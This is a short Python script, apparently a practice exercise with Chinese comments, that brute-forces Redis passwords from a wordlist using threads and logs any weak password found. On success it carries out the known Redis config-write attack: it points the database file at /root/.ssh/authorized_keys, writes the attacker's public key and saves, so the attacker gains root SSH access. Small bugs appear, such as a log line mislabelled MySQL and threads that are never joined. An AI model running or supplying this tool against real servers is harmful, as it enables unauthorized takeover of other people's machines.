#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""  
@Project : PythonProject4
@File : readis_val.py.py
@Author : 你的名字  张三 李四
@Time : 2025/7/6 14:43  
@脚本说明 : 

"""

import threading
from redis import Redis


def san_redis(host, port, password, public_key):
    try:
        redis_cli = Redis(
            host=host,
            port=port,
            password=password,
            db=0,
            encoding="utf-8",
            socket_timeout=3,
            socket_connect_timeout=3
        )
        redis_cli.set("aa", "bb")
        result = redis_cli.get("aa")
        if result:
            print(f"[+] 存在弱口令：{host}:{port} - {password}")
            with open(file="./redis_result.txt", mode="a+", encoding="utf-8") as f:
                f.write(f"[+] MySQL {host}:{port} 存在弱口令, {password}\n")
            if public_key:
                print("[*] 进一步未授权访问漏洞利用ing...")
                try:
                    redis_cli.config_set("dir", "/root/.ssh")
                    redis_cli.config_set("dbfilename", "authorized_keys")
                    with open(file=f"{public_key}", mode="r", encoding="utf-8") as f:
                        redis_cli.set("hacker", "\n\n " + f.read() + " \n\n")
                        redis_cli.save()
                        print("[+] 未授权访漏洞利用成功,请使用私钥连接~")
                except:
                    print("[-] 未授权访问漏洞利用失败")
    except:
        pass


def val_redis(host, port, file, public_key):
    thread_list = []
    with open(file=f"{file}", mode="r", encoding="utf-8") as p:
        for passwd in p.readlines():
            t = threading.Thread(target=san_redis, args=(host, port, passwd.strip(), public_key))
            t.start()
            for t in thread_list:
                t.join()